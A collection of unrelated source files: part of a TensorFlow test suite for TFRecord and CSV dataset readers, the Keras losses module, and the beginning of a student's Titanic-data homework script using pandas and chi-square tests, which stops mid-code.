file_batch, keywords_batch_indices, keywords_batch_values,
[batch_size, keywords_batch_max_len], record_batch
]
file_batch = []
keywords_batch_indices = []
keywords_batch_values = []
keywords_batch_max_len = 0
record_batch = []
batch_index = 0
if file_batch:
yield [
file_batch, keywords_batch_indices, keywords_batch_values,
[len(file_batch), keywords_batch_max_len], record_batch
]
def _verify_records(self,
sess,
batch_size,
file_index=None,
num_epochs=1,
interleave_cycle_length=1):
if file_index is not None:
file_indices = [file_index]
else:
file_indices = range(self._num_files)
for expected_batch in self._next_expected_batch(
file_indices, batch_size, num_epochs, interleave_cycle_length):
actual_batch = self._next_actual_batch(sess)
for i in range(len(expected_batch)):
self.assertAllEqual(expected_batch[i], actual_batch[i])
def testRead(self):
for batch_size in [1, 2]:
for num_epochs in [1, 10]:
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from file 0.
self.outputs = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size)
self._verify_records(sess, batch_size, 0, num_epochs=num_epochs)
with self.assertRaises(errors.OutOfRangeError):
self._next_actual_batch(sess)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from file 1.
self.outputs = self._read_batch_features(
filenames=self.test_filenames[1],
num_epochs=num_epochs,
batch_size=batch_size)
self._verify_records(sess, batch_size, 1, num_epochs=num_epochs)
with self.assertRaises(errors.OutOfRangeError):
self._next_actual_batch(sess)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from both files.
self.outputs = self._read_batch_features(
filenames=self.test_filenames,
num_epochs=num_epochs,
batch_size=batch_size)
self._verify_records(sess, batch_size, num_epochs=num_epochs)
with self.assertRaises(errors.OutOfRangeError):
self._next_actual_batch(sess)
def testReadWithEquivalentDataset(self):
features = {
"file": parsing_ops.FixedLenFeature([], dtypes.int64),
"record": parsing_ops.FixedLenFeature([], dtypes.int64),
}
dataset = (
core_readers.TFRecordDataset(self.test_filenames)
.map(lambda x: parsing_ops.parse_single_example(x, features))
.repeat(10).batch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
next_element = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for file_batch, _, _, _, record_batch in self._next_expected_batch(
range(self._num_files), 2, 10):
actual_batch = sess.run(next_element)
self.assertAllEqual(file_batch, actual_batch["file"])
self.assertAllEqual(record_batch, actual_batch["record"])
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
def testReadWithFusedShuffleRepeatDataset(self):
num_epochs = 5
total_records = num_epochs * self._num_records
for batch_size in [1, 2]:
# Test that shuffling with same seed produces the same result.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
outputs1 = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
outputs2 = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
for _ in range(total_records // batch_size):
batch1 = self._run_actual_batch(outputs1, sess)
batch2 = self._run_actual_batch(outputs2, sess)
for i in range(len(batch1)):
self.assertAllEqual(batch1[i], batch2[i])
# Test that shuffling with different seeds produces a different order.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
outputs1 = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
outputs2 = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
shuffle=True,
shuffle_seed=15)
all_equal = True
for _ in range(total_records // batch_size):
batch1 = self._run_actual_batch(outputs1, sess)
batch2 = self._run_actual_batch(outputs2, sess)
for i in range(len(batch1)):
all_equal = all_equal and np.array_equal(batch1[i], batch2[i])
self.assertFalse(all_equal)
def testParallelReadersAndParsers(self):
num_epochs = 5
for batch_size in [1, 2]:
for reader_num_threads in [2, 4]:
for parser_num_threads in [2, 4]:
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
self.outputs = self._read_batch_features(
filenames=self.test_filenames,
num_epochs=num_epochs,
batch_size=batch_size,
reader_num_threads=reader_num_threads,
parser_num_threads=parser_num_threads)
self._verify_records(
sess,
batch_size,
num_epochs=num_epochs,
interleave_cycle_length=reader_num_threads)
with self.assertRaises(errors.OutOfRangeError):
self._next_actual_batch(sess)
def testDropFinalBatch(self):
for batch_size in [1, 2]:
for num_epochs in [1, 10]:
with ops.Graph().as_default():
# Basic test: read from file 0.
self.outputs = self._read_batch_features(
filenames=self.test_filenames[0],
num_epochs=num_epochs,
batch_size=batch_size,
drop_final_batch=True)
for _, tensor in self.outputs.items():
if isinstance(tensor, ops.Tensor): # Guard against SparseTensor.
self.assertEqual(tensor.shape[0], batch_size)
class MakeCsvDatasetTest(test.TestCase):
COLUMN_TYPES = [
dtypes.int32, dtypes.int64, dtypes.float32, dtypes.float64, dtypes.string
]
COLUMNS = ["col%d" % i for i in range(len(COLUMN_TYPES))]
DEFAULT_VALS = [[], [], [], [], ["NULL"]]
DEFAULTS = [
constant_op.constant([], dtype=dtypes.int32),
constant_op.constant([], dtype=dtypes.int64),
constant_op.constant([], dtype=dtypes.float32),
constant_op.constant([], dtype=dtypes.float64),
constant_op.constant(["NULL"], dtype=dtypes.string)
]
LABEL = COLUMNS[0]
def setUp(self):
super(MakeCsvDatasetTest, self).setUp()
self._num_files = 2
self._num_records = 11
self._test_filenames = self._create_files()
def _csv_values(self, fileno, recordno):
return [
fileno,
recordno,
fileno * recordno * 0.5,
fileno * recordno + 0.5,
"record %d" % recordno if recordno % 2 == 1 else "",
]
def _write_file(self, filename, rows):
for i in range(len(rows)):
if isinstance(rows[i], list):
rows[i] = ",".join(str(v) if v is not None else "" for v in rows[i])
fn = os.path.join(self.get_temp_dir(), filename)
f = open(fn, "w")
f.write("\n".join(rows))
f.close()
return fn
def _create_file(self, fileno, header=True):
rows = []
if header:
rows.append(self.COLUMNS)
for recno in range(self._num_records):
rows.append(self._csv_values(fileno, recno))
return self._write_file("csv_file%d.csv" % fileno, rows)
def _create_files(self):
filenames = []
for i in range(self._num_files):
filenames.append(self._create_file(i))
return filenames
def _make_csv_dataset(
self,
filenames,
defaults,
column_names=COLUMNS,
label_name=LABEL,
select_cols=None,
batch_size=1,
num_epochs=1,
shuffle=False,
shuffle_seed=None,
header=True,
na_value="",
):
return readers.make_csv_dataset(
filenames,
batch_size=batch_size,
column_names=column_names,
column_defaults=defaults,
label_name=label_name,
num_epochs=num_epochs,
shuffle=shuffle,
shuffle_seed=shuffle_seed,
header=header,
na_value=na_value,
select_columns=select_cols,
)
def _next_actual_batch(self, file_indices, batch_size, num_epochs, defaults):
features = {col: list() for col in self.COLUMNS}
for _ in range(num_epochs):
for i in file_indices:
for j in range(self._num_records):
values = self._csv_values(i, j)
for n, v in enumerate(values):
if v == "": # pylint: disable=g-explicit-bool-comparison
values[n] = defaults[n][0]
values[-1] = values[-1].encode("utf-8")
# Regroup lists by column instead of row
for n, col in enumerate(self.COLUMNS):
features[col].append(values[n])
if len(list(features.values())[0]) == batch_size:
yield features
features = {col: list() for col in self.COLUMNS}
def _run_actual_batch(self, outputs, sess):
features, labels = sess.run(outputs)
batch = [features[k] for k in self.COLUMNS if k != self.LABEL]
batch.append(labels)
return batch
def _verify_records(
self,
sess,
dataset,
file_indices,
defaults=tuple(DEFAULT_VALS),
label_name=LABEL,
batch_size=1,
num_epochs=1,
):
iterator = dataset.make_one_shot_iterator()
get_next = iterator.get_next()
for expected_features in self._next_actual_batch(file_indices, batch_size,
num_epochs, defaults):
actual_features = sess.run(get_next)
if label_name is not None:
expected_labels = expected_features.pop(label_name)
# Compare labels
self.assertAllEqual(expected_labels, actual_features[1])
actual_features = actual_features[0] # Extract features dict from tuple
for k in expected_features.keys():
# Compare features
self.assertAllEqual(expected_features[k], actual_features[k])
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMakeCSVDataset(self):
defaults = self.DEFAULTS
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from file 0.
dataset = self._make_csv_dataset(self._test_filenames[0], defaults)
self._verify_records(sess, dataset, [0])
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Basic test: read from file 1.
dataset = self._make_csv_dataset(self._test_filenames[1], defaults)
self._verify_records(sess, dataset, [1])
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Read from both files.
dataset = self._make_csv_dataset(self._test_filenames, defaults)
self._verify_records(sess, dataset, range(self._num_files))
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Read from both files. Exercise the `batch` and `num_epochs` parameters
# of make_csv_dataset and make sure they work.
dataset = self._make_csv_dataset(
self._test_filenames, defaults, batch_size=2, num_epochs=10)
self._verify_records(
sess, dataset, range(self._num_files), batch_size=2, num_epochs=10)
def testMakeCSVDataset_withBadColumns(self):
"""Tests that exception is raised when input is malformed.
"""
dupe_columns = self.COLUMNS[:-1] + self.COLUMNS[:1]
defaults = self.DEFAULTS
# Duplicate column names
with self.assertRaises(ValueError):
self._make_csv_dataset(
self._test_filenames, defaults, column_names=dupe_columns)
# Label key not one of column names
with self.assertRaises(ValueError):
self._make_csv_dataset(
self._test_filenames, defaults, label_name="not_a_real_label")
def testMakeCSVDataset_withNoLabel(self):
"""Tests that CSV datasets can be created when no label is specified.
"""
defaults = self.DEFAULTS
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Read from both files. Make sure this works with no label key supplied.
dataset = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=2,
num_epochs=10,
label_name=None)
self._verify_records(
sess,
dataset,
range(self._num_files),
batch_size=2,
num_epochs=10,
label_name=None)
def testMakeCSVDataset_withNoHeader(self):
"""Tests that datasets can be created from CSV files with no header line.
"""
defaults = self.DEFAULTS
file_without_header = self._create_file(
len(self._test_filenames), header=False)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
file_without_header,
defaults,
batch_size=2,
num_epochs=10,
header=False,
)
self._verify_records(
sess,
dataset,
[len(self._test_filenames)],
batch_size=2,
num_epochs=10,
)
def testMakeCSVDataset_withTypes(self):
"""Tests that defaults can be a dtype instead of a Tensor for required vals.
"""
defaults = [d for d in self.COLUMN_TYPES[:-1]]
defaults.append(constant_op.constant(["NULL"], dtype=dtypes.string))
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(self._test_filenames, defaults)
self._verify_records(sess, dataset, range(self._num_files))
def testMakeCSVDataset_withNoColNames(self):
"""Tests that datasets can be created when column names are not specified.
In that case, we should infer the column names from the header lines.
"""
defaults = self.DEFAULTS
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Read from both files. Exercise the `batch` and `num_epochs` parameters
# of make_csv_dataset and make sure they work.
dataset = self._make_csv_dataset(
self._test_filenames,
defaults,
column_names=None,
batch_size=2,
num_epochs=10)
self._verify_records(
sess, dataset, range(self._num_files), batch_size=2, num_epochs=10)
def testMakeCSVDataset_withTypeInferenceMismatch(self):
# Test that error is thrown when num fields doesn't match columns
with self.assertRaises(ValueError):
self._make_csv_dataset(
self._test_filenames,
column_names=self.COLUMNS + ["extra_name"],
defaults=None,
batch_size=2,
num_epochs=10)
def testMakeCSVDataset_withTypeInference(self):
"""Tests that datasets can be created when no defaults are specified.
In that case, we should infer the types from the first N records.
"""
# Test that it works with standard test files (with header, etc)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
self._test_filenames, defaults=None, batch_size=2, num_epochs=10)
self._verify_records(
sess,
dataset,
range(self._num_files),
batch_size=2,
num_epochs=10,
defaults=[[], [], [], [], [""]])
def testMakeCSVDataset_withTypeInferenceTricky(self):
# Test on a deliberately tricky file (type changes as we read more rows, and
# there are null values)
fn = os.path.join(self.get_temp_dir(), "file.csv")
expected_dtypes = [
dtypes.int32, dtypes.int64, dtypes.float32, dtypes.float32,
dtypes.string, dtypes.string
]
col_names = ["col%d" % i for i in range(len(expected_dtypes))]
rows = [[None, None, None, "NAN", "",
"a"], [1, 2**31 + 1, 2**64, 123, "NAN", ""],
['"123"', 2, 2**64, 123.4, "NAN", '"cd,efg"']]
expected = [[0, 0, 0, 0, "", "a"], [1, 2**31 + 1, 2**64, 123, "", ""],
[123, 2, 2**64, 123.4, "", "cd,efg"]]
for row in expected:
row[-1] = row[-1].encode("utf-8") # py3 expects byte strings
row[-2] = row[-2].encode("utf-8") # py3 expects byte strings
self._write_file("file.csv", [col_names] + rows)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=None,
label_name=None,
na_value="NAN",
)
features = dataset.make_one_shot_iterator().get_next()
# Check that types match
for i in range(len(expected_dtypes)):
print(features["col%d" % i].dtype, expected_dtypes[i])
assert features["col%d" % i].dtype == expected_dtypes[i]
for i in range(len(rows)):
assert sess.run(features) == dict(zip(col_names, expected[i]))
def testMakeCSVDataset_withTypeInferenceAllTypes(self):
# Test that we make the correct inference for all types with fallthrough
fn = os.path.join(self.get_temp_dir(), "file.csv")
expected_dtypes = [
dtypes.int32, dtypes.int64, dtypes.float32, dtypes.float64,
dtypes.string, dtypes.string
]
col_names = ["col%d" % i for i in range(len(expected_dtypes))]
rows = [[1, 2**31 + 1, 1.0, 4e40, "abc", ""]]
expected = [[
1, 2**31 + 1, 1.0, 4e40, "abc".encode("utf-8"), "".encode("utf-8")
]]
self._write_file("file.csv", [col_names] + rows)
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=None,
label_name=None,
na_value="NAN",
)
features = dataset.make_one_shot_iterator().get_next()
# Check that types match
for i in range(len(expected_dtypes)):
self.assertAllEqual(features["col%d" % i].dtype, expected_dtypes[i])
for i in range(len(rows)):
self.assertAllEqual(
sess.run(features), dict(zip(col_names, expected[i])))
def testMakeCSVDataset_withSelectColsError(self):
data = [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]
col_names = ["col%d" % i for i in range(5)]
fn = self._write_file("file.csv", [col_names] + data)
with self.assertRaises(ValueError):
# Mismatch in number of defaults and number of columns selected,
# should raise an error
self._make_csv_dataset(
fn,
defaults=[[0]] * 5,
column_names=col_names,
label_name=None,
select_cols=[1, 3])
with self.assertRaises(ValueError):
# Invalid column name should raise an error
self._make_csv_dataset(
fn,
defaults=[[0]],
column_names=col_names,
label_name=None,
select_cols=["invalid_col_name"])
def testMakeCSVDataset_withSelectCols(self):
data = [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]
col_names = ["col%d" % i for i in range(5)]
fn = self._write_file("file.csv", [col_names] + data)
# If select_cols is specified, should only yield a subset of columns
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=[[0], [0]],
column_names=col_names,
label_name=None,
select_cols=[1, 3])
expected = [[1, 3], [6, 8]]
features = dataset.make_one_shot_iterator().get_next()
for i in range(len(data)):
self.assertAllEqual(
sess.run(features),
dict(zip([col_names[1], col_names[3]], expected[i])))
# Can still do default inference with select_cols
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=col_names,
label_name=None,
select_cols=[1, 3])
expected = [[1, 3], [6, 8]]
features = dataset.make_one_shot_iterator().get_next()
for i in range(len(data)):
self.assertAllEqual(
sess.run(features),
dict(zip([col_names[1], col_names[3]], expected[i])))
# Can still do column name inference
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=None,
label_name=None,
select_cols=[1, 3])
expected = [[1, 3], [6, 8]]
features = dataset.make_one_shot_iterator().get_next()
for i in range(len(data)):
self.assertAllEqual(
sess.run(features),
dict(zip([col_names[1], col_names[3]], expected[i])))
# Can specify column names instead of indices
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=None,
label_name=None,
select_cols=[col_names[1], col_names[3]])
expected = [[1, 3], [6, 8]]
features = dataset.make_one_shot_iterator().get_next()
for i in range(len(data)):
self.assertAllEqual(
sess.run(features),
dict(zip([col_names[1], col_names[3]], expected[i])))
def testMakeCSVDataset_withShuffle(self):
total_records = self._num_files * self._num_records
defaults = self.DEFAULTS
for batch_size in [1, 2]:
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Test that shuffling with the same seed produces the same result
dataset1 = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
dataset2 = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
outputs1 = dataset1.make_one_shot_iterator().get_next()
outputs2 = dataset2.make_one_shot_iterator().get_next()
for _ in range(total_records // batch_size):
batch1 = self._run_actual_batch(outputs1, sess)
batch2 = self._run_actual_batch(outputs2, sess)
for i in range(len(batch1)):
self.assertAllEqual(batch1[i], batch2[i])
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Test that shuffling with a different seed produces different results
dataset1 = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
dataset2 = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=batch_size,
shuffle=True,
shuffle_seed=6)
outputs1 = dataset1.make_one_shot_iterator().get_next()
outputs2 = dataset2.make_one_shot_iterator().get_next()
all_equal = False
for _ in range(total_records // batch_size):
batch1 = self._run_actual_batch(outputs1, sess)
batch2 = self._run_actual_batch(outputs2, sess)
for i in range(len(batch1)):
all_equal = all_equal and np.array_equal(batch1[i], batch2[i])
self.assertFalse(all_equal)
class MakeTFRecordDatasetTest(TFRecordDatasetTestBase):
def _next_expected_batch(self,
file_indices,
batch_size,
num_epochs,
cycle_length,
drop_final_batch,
use_parser_fn):
def _next_record(file_indices):
for j in file_indices:
for i in range(self._num_records):
yield j, i
def _next_record_interleaved(file_indices, cycle_length):
return _interleave([_next_record([i]) for i in file_indices],
cycle_length)
record_batch = []
batch_index = 0
for _ in range(num_epochs):
if cycle_length == 1:
next_records = _next_record(file_indices)
else:
next_records = _next_record_interleaved(file_indices, cycle_length)
for f, r in next_records:
record = self._record(f, r)
if use_parser_fn:
record = record[1:]
record_batch.append(record)
batch_index += 1
if len(record_batch) == batch_size:
yield record_batch
record_batch = []
batch_index = 0
if record_batch and not drop_final_batch:
yield record_batch
def _verify_records(self,
sess,
outputs,
batch_size,
file_index,
num_epochs,
interleave_cycle_length,
drop_final_batch,
use_parser_fn):
if file_index is not None:
file_indices = [file_index]
else:
file_indices = range(self._num_files)
for expected_batch in self._next_expected_batch(
file_indices, batch_size, num_epochs, interleave_cycle_length,
drop_final_batch, use_parser_fn):
actual_batch = sess.run(outputs)
self.assertAllEqual(expected_batch, actual_batch)
def _read_test(self, batch_size, num_epochs, file_index=None,
num_parallel_reads=1, drop_final_batch=False, parser_fn=False):
if file_index is None:
file_pattern = self.test_filenames
else:
file_pattern = self.test_filenames[file_index]
if parser_fn:
fn = lambda x: string_ops.substr(x, 1, 999)
else:
fn = None
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
outputs = readers.make_tf_record_dataset(
file_pattern=file_pattern,
num_epochs=num_epochs,
batch_size=batch_size,
parser_fn=fn,
num_parallel_reads=num_parallel_reads,
drop_final_batch=drop_final_batch,
shuffle=False).make_one_shot_iterator().get_next()
self._verify_records(
sess, outputs, batch_size, file_index, num_epochs=num_epochs,
interleave_cycle_length=num_parallel_reads,
drop_final_batch=drop_final_batch, use_parser_fn=parser_fn)
with self.assertRaises(errors.OutOfRangeError):
sess.run(outputs)
def testRead(self):
for batch_size in [1, 2]:
for num_epochs in [1, 3]:
# Basic test: read from file 0.
self._read_test(batch_size, num_epochs, 0)
# Basic test: read from file 1.
self._read_test(batch_size, num_epochs, 1)
# Basic test: read from both files.
self._read_test(batch_size, num_epochs)
# Basic test: read from both files, with parallel reads.
self._read_test(batch_size, num_epochs, num_parallel_reads=8)
def testDropFinalBatch(self):
for batch_size in [1, 2, 10]:
for num_epochs in [1, 3]:
# Read from file 0.
self._read_test(batch_size, num_epochs, 0, drop_final_batch=True)
# Read from both files.
self._read_test(batch_size, num_epochs, drop_final_batch=True)
# Read from both files, with parallel reads.
self._read_test(batch_size, num_epochs, num_parallel_reads=8,
drop_final_batch=True)
def testParserFn(self):
for batch_size in [1, 2]:
for num_epochs in [1, 3]:
for drop_final_batch in [False, True]:
self._read_test(batch_size, num_epochs, parser_fn=True,
drop_final_batch=drop_final_batch)
self._read_test(batch_size, num_epochs, num_parallel_reads=8,
parser_fn=True, drop_final_batch=drop_final_batch)
def _shuffle_test(self, batch_size, num_epochs, num_parallel_reads=1,
seed=None):
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = readers.make_tf_record_dataset(
file_pattern=self.test_filenames,
num_epochs=num_epochs,
batch_size=batch_size,
num_parallel_reads=num_parallel_reads,
shuffle=True,
shuffle_seed=seed)
iterator = dataset.make_initializable_iterator()
next_element = iterator.get_next()
sess.run(iterator.initializer)
first_batches = []
try:
while True:
first_batches.append(sess.run(next_element))
except errors.OutOfRangeError:
pass
sess.run(iterator.initializer)
second_batches = []
try:
while True:
second_batches.append(sess.run(next_element))
except errors.OutOfRangeError:
pass
self.assertEqual(len(first_batches), len(second_batches))
if seed is not None:
# if you set a seed, should get the same results
for i in range(len(first_batches)):
self.assertAllEqual(first_batches[i], second_batches[i])
expected = []
for f in range(self._num_files):
for r in range(self._num_records):
expected.extend([self._record(f, r)] * num_epochs)
for batches in (first_batches, second_batches):
actual = []
for b in batches:
actual.extend(b)
self.assertAllEqual(sorted(expected), sorted(actual))
def testShuffle(self):
for batch_size in [1, 2]:
for num_epochs in [1, 3]:
for num_parallel_reads in [1, 2]:
# Test that all expected elements are produced
self._shuffle_test(batch_size, num_epochs, num_parallel_reads)
# Test that elements are produced in a consistent order if
# you specify a seed.
self._shuffle_test(batch_size, num_epochs, num_parallel_reads,
seed=21345)
if __name__ == "__main__":
test.main()
```
#### File: python/keras/losses.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.util.tf_export import tf_export
@tf_export('keras.metrics.mean_squared_error',
'keras.losses.mean_squared_error')
def mean_squared_error(y_true, y_pred):
return K.mean(math_ops.square(y_pred - y_true), axis=-1)
@tf_export('keras.metrics.mean_absolute_error',
'keras.losses.mean_absolute_error')
def mean_absolute_error(y_true, y_pred):
return K.mean(math_ops.abs(y_pred - y_true), axis=-1)
@tf_export('keras.metrics.mean_absolute_percentage_error',
'keras.losses.mean_absolute_percentage_error')
def mean_absolute_percentage_error(y_true, y_pred):
diff = math_ops.abs(
(y_true - y_pred) / K.clip(math_ops.abs(y_true), K.epsilon(), None))
return 100. * K.mean(diff, axis=-1)
@tf_export('keras.metrics.mean_squared_logarithmic_error',
'keras.losses.mean_squared_logarithmic_error')
def mean_squared_logarithmic_error(y_true, y_pred):
first_log = math_ops.log(K.clip(y_pred, K.epsilon(), None) + 1.)
second_log = math_ops.log(K.clip(y_true, K.epsilon(), None) + 1.)
return K.mean(math_ops.square(first_log - second_log), axis=-1)
@tf_export('keras.metrics.squared_hinge', 'keras.losses.squared_hinge')
def squared_hinge(y_true, y_pred):
return K.mean(
math_ops.square(math_ops.maximum(1. - y_true * y_pred, 0.)), axis=-1)
@tf_export('keras.metrics.hinge', 'keras.losses.hinge')
def hinge(y_true, y_pred):
return K.mean(math_ops.maximum(1. - y_true * y_pred, 0.), axis=-1)
@tf_export('keras.losses.categorical_hinge')
def categorical_hinge(y_true, y_pred):
pos = math_ops.reduce_sum(y_true * y_pred, axis=-1)
neg = math_ops.reduce_max((1. - y_true) * y_pred, axis=-1)
return math_ops.maximum(0., neg - pos + 1.)
@tf_export('keras.losses.logcosh')
def logcosh(y_true, y_pred):
"""Logarithm of the hyperbolic cosine of the prediction error.
`log(cosh(x))` is approximately equal to `(x ** 2) / 2` for small `x` and
to `abs(x) - log(2)` for large `x`. This means that 'logcosh' works mostly
like the mean squared error, but will not be so strongly affected by the
occasional wildly incorrect prediction.
Arguments:
y_true: tensor of true targets.
y_pred: tensor of predicted targets.
Returns:
Tensor with one scalar loss entry per sample.
"""
def _logcosh(x):
return x + nn.softplus(-2. * x) - math_ops.log(2.)
return K.mean(_logcosh(y_pred - y_true), axis=-1)
@tf_export('keras.metrics.categorical_crossentropy',
'keras.losses.categorical_crossentropy')
def categorical_crossentropy(y_true, y_pred):
return K.categorical_crossentropy(y_true, y_pred)
@tf_export('keras.metrics.sparse_categorical_crossentropy',
'keras.losses.sparse_categorical_crossentropy')
def sparse_categorical_crossentropy(y_true, y_pred):
return K.sparse_categorical_crossentropy(y_true, y_pred)
@tf_export('keras.metrics.binary_crossentropy',
'keras.losses.binary_crossentropy')
def binary_crossentropy(y_true, y_pred):
return K.mean(K.binary_crossentropy(y_true, y_pred), axis=-1)
@tf_export('keras.metrics.kullback_leibler_divergence',
'keras.losses.kullback_leibler_divergence')
def kullback_leibler_divergence(y_true, y_pred):
y_true = K.clip(y_true, K.epsilon(), 1)
y_pred = K.clip(y_pred, K.epsilon(), 1)
return math_ops.reduce_sum(y_true * math_ops.log(y_true / y_pred), axis=-1)
@tf_export('keras.metrics.poisson', 'keras.losses.poisson')
def poisson(y_true, y_pred):
return K.mean(y_pred - y_true * math_ops.log(y_pred + K.epsilon()), axis=-1)
@tf_export('keras.metrics.cosine_proximity', 'keras.losses.cosine_proximity')
def cosine_proximity(y_true, y_pred):
y_true = nn.l2_normalize(y_true, axis=-1)
y_pred = nn.l2_normalize(y_pred, axis=-1)
return -math_ops.reduce_sum(y_true * y_pred, axis=-1)
# Aliases.
mse = MSE = mean_squared_error
mae = MAE = mean_absolute_error
mape = MAPE = mean_absolute_percentage_error
msle = MSLE = mean_squared_logarithmic_error
kld = KLD = kullback_leibler_divergence
cosine = cosine_proximity
@tf_export('keras.losses.serialize')
def serialize(loss):
return serialize_keras_object(loss)
@tf_export('keras.losses.deserialize')
def deserialize(name, custom_objects=None):
return deserialize_keras_object(
name,
module_objects=globals(),
custom_objects=custom_objects,
printable_module_name='loss function')
@tf_export('keras.losses.get')
def get(identifier):
if identifier is None:
return None
if isinstance(identifier, six.string_types):
identifier = str(identifier)
return deserialize(identifier)
if isinstance(identifier, dict):
return deserialize(identifier)
elif callable(identifier):
return identifier
else:
raise ValueError('Could not interpret '
'loss function identifier:', identifier)
``` |
{
"source": "Jibanul/CAP5610_MachineLearning",
"score": 3
} |
#### File: CAP5610_MachineLearning/Homework1/hw1.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import random
from scipy.stats import chi2_contingency
# import data
train_df = pd.read_csv('/Users/mdjibanulhaquejiban/PhD_CRCV/Semesters/Spring2021/ML/HW/HW1/Titanic/train.csv')
test_df = pd.read_csv('/Users/mdjibanulhaquejiban/PhD_CRCV/Semesters/Spring2021/ML/HW/HW1/Titanic/test.csv')
combine = [train_df, test_df]
#######################
## Q1
print(train_df)
print(train_df.describe())
print(train_df.info())
## Q2-Q4
print(train_df.info())
## Q5
print(train_df.info())
print(test_df.info())
## Q6
print(train_df.head())
## Q7
# create a sub-dataframe with only numerical features
train_df_num = train_df[['Age', 'SibSp', 'Parch', 'Fare']]
print(train_df_num.describe())
## Q8
# create a sub-dataframe with only categorical features
train_df_cat = train_df[['Survived', 'Pclass', 'Name', 'Sex', 'Ticket', 'Cabin', 'Embarked', 'PassengerId']]
train_df_cat = train_df_cat.astype('object')
# print(train_df_cat.info())
train_df_cat.describe(include=[object])
## Q9
contigency_table= pd.crosstab(train_df['Pclass'], train_df['Survived'])
print('The contigency table:')
print('\n')
print(contigency_table)
# Chi-Sq test
chi2, p_value, deg_freedom, expected = chi2_contingency(contigency_table)
print('\n')
print('The test statistic is', chi2)
print('\n')
print('The p-value of the test is', p_value)
print('\n')
print('Degrees of freedom is', deg_freedom)
print('\n')
print('The expected frequencies, based on the marginal sums of the table. \n', expected)
## Q10
female = np.where((train_df['Sex']=='female'))
female_survived = np.where((train_df['Sex']=='female') & (train_df['Survived'] == 1))
print("The ratio of female survivals in training set is", len(female_survived[0])/len(female[0]))
## Chi-Sq
contigency_table= pd.crosstab(train_df['Sex'], train_df['Survived'])
print('The contigency table:')
print('\n')
print(contigency_table)
# Chi-Sq test
chi2, p_value, deg_freedom, expected = chi2_contingency(contigency_table)
print('\n')
print('The test statistic is', chi2)
print('\n')
print('The p-value of the test is', p_value)
## Q11
survived_age = train_df.loc[np.where((train_df['Survived'] == 1))]['Age']
not_survived_age = train_df.loc[np.where((train_df['Survived'] == 0))]['Age']
# survived histogram
survived_age.hist(bins=21, color='orange')
plt.xlabel('Age')
plt.ylabel('Frequency')
plt.title('Distribution of Age of People who survived (= 1)')
plt.show()
plt.close()
# not survived histogram
not_survived_age.hist(bins=21, color='tomato')
plt.xlabel('Age')
plt.ylabel('Frequency')
plt.title('Distribution of Age of People who did not survive (= 0)')
plt.show()
plt.close()
## Q12
# Create data
not_survived_pclass1_age = train_df.loc[np.where((train_df['Pclass'] == 1) & (train_df['Survived'] == 0))]['Age']
